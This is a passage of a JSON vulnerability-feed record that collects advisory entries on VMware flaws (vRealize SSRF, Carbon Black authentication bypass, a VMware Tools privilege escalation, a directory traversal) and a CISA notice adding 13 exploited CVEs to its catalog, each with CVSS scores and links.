{"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-21T00:00:00", "type": "checkpoint_advisories", "title": "URL Directory Traversal Over HTTP Traffic (CVE-2021-21983)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2021-04-21T00:00:00", "id": "CPAI-2021-0234", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware 
Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:37:55", "description": "[](<https://thehackernews.com/images/-j136_z7UZNc/YNQ7Y__WRWI/AAAAAAAAC-U/oIYaMgYSXVYLJkHR5taYmCdxvH79jX-ewCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has rolled out security updates to resolve a critical flaw affecting Carbon Black App Control that could be exploited to bypass authentication and take control of vulnerable systems.\n\nThe vulnerability, identified as CVE-2021-21998, is rated 9.4 out of 10 in severity by the industry-standard Common Vulnerability Scoring System (CVSS) and affects App Control (AppC) versions 8.0.x, 8.1.x, 8.5.x, and 8.6.x.\n\n[Carbon Black App Control](<https://www.carbonblack.com/products/app-control/>) is a security solution designed to lock down critical systems and servers to prevent unauthorized changes in the face of cyber-attacks and ensure compliance with regulatory mandates such as PCI-DSS, HIPAA, GDPR, SOX, FISMA, and NERC.\n\n\"A malicious actor with network access to the VMware Carbon Black App Control management server might be able to obtain administrative access to the product without the need to authenticate,\" the California-based cloud computing and virtualization technology company 
[said](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>) in an advisory.\n\nCVE-2021-21998 is the second time VMware is addressing an authentication bypass issue in its Carbon Black endpoint security software. Earlier this April, the company fixed an incorrect URL handling vulnerability in the Carbon Black Cloud Workload appliance ([CVE-2021-21982](<https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html>)) that could be exploited to gain access to the administration API. \n\nThat's not all. VMware also patched a local privilege escalation bug affecting VMware Tools for Windows, VMware Remote Console for Windows (VMRC for Windows), and VMware App Volumes (CVE-2021-21999, CVSS score: 7.8) that could allow a bad actor to execute arbitrary code on affected systems.\n\n\"An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed with elevated privileges,\" VMware [noted](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>).\n\nVMware credited Zeeshan Shaikh (@bugzzzhunter) from NotSoSecure and Hou JingYi (@hjy79425575) of Qihoo 360 for reporting the flaw.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-24T08:00:00", "type": "thn", "title": "Critical Auth Bypass Bug Affects VMware Carbon Black App Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"], "modified": "2021-06-24T08:00:41", "id": "THN:868A288940CAEB61BD09AB7B818AD160", "href": "https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. 
These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. 
See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, 
"acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}